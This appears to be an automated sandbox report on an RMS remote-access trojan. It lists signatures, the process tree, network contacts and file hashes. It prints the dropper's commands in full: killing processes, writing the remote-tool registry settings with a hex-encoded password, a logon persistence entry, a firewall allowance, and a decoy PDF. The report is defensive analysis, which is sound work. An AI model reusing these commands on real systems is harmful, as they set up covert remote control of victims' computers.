Malware Analysis Report

2024-11-30 19:52

Sample ID 220128-17qlmsfda9
Target 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920
SHA256 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920
Tags
rms rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920

Threat Level: Known bad

The file 80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920 was found to be: Known bad.

Malicious Activity Summary

rms rat trojan

RMS

Executes dropped EXE

Loads dropped DLL

autoit_exe

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-28 22:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 22:17

Reported

2022-01-28 22:45

Platform

win7-en-20211208

Max time kernel

155s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

Signatures

RMS

trojan rat rms

autoit_exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 1684 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1552 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1100 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 540 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe" /rhc uac.cmd

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c0c50617373776f726444617461060c364f6d2b75675147394b493d084869646553746f70090c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323033342e37373133373636373832084c6963656e73657306ba524d532d462d36423764666137333434354538394333393762653062623966423866433637666269593253326459586c52664477776e493233696f4f4743346f44686a584b647a4134585246344d44463145624373685631304e48313545447777374b57304241414d484151514e487a7370625135635251344141687741616d426841676b4362774d454377566d64324d4c424235555267344e557a773562514945486c4e635241384d6653593253326459586c526644773d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a0a4164646974696f6e616c0604353535351144697361626c65496e7465726e65744964080b536166654d6f6465536574080000

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600310030003000330022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e0067006c00690067006f00720069006a006d00610073006b006f00760040006d00610069006c002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00330039003600430045003300460032002d0035003000460037002d0034003300340033002d0038003300450036002d004100420036003600430035003400440046003400320041007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360031003000300033003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

hide.exe /fwl Internet C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf"

Network

Country Destination Domain Proto
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
US 8.8.8.8:53 rmansys.ru udp
RU 31.31.198.18:80 rmansys.ru tcp
RU 31.31.198.18:80 rmansys.ru tcp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp

Files

memory/1684-54-0x0000000075D51000-0x0000000075D53000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd

MD5 36d09166ae9f88caa1b2d80a392ed1c8
SHA1 b248e43bab127d8e1e466821b96b7b7ecf37cb78
SHA256 3552631b96bf28d3e4641cc83684e5bd2cc00cc9aca31d456c688d16df674135
SHA512 d45e916cd913c6c1fbd59cd94c8ab55c158c9c616decaffccf0334ae4dd82b30301809c334322858c9b8b44d5d72bfe2ee2ee5b11a65a5ea9d945581e67a089b

C:\Users\Admin\AppData\Local\Temp\RarSFX0\data.dat

MD5 f1d16ce97d2fb39ad52e84bdc8d51d46
SHA1 c268cab6d8ec267eee463672809faaee99c2f446
SHA256 85417332dae0e7cf7ee44773d19e344c27bbf000d9165ca1e0c7a6d0f9e57a0f
SHA512 cff4f2475ed74e9102a2cfd88d019119f90d47086dcef3a2c053c0a7b0279076caf7782aeb314b857c304b52cd482badb4e6e1a611191a807317e92e60fe16e5

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\MIP1023.pdf

MD5 83f604f3087b84afc6846673054e861f
SHA1 88c3fda42768c5b465fd680591639f2cdc933283
SHA256 11e0a49bfe8173983e6ddf13052da345b3322f8d6d8cd2e89dd602d89941516e
SHA512 73ff11caf9b5415157c409d3bcef0b534146538c632f4850ab813cfdbb15ef5f057ad2a1bda591e9ec27ad16d7e8aa10e4b58bc603db53c859819f1a08c01f98

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

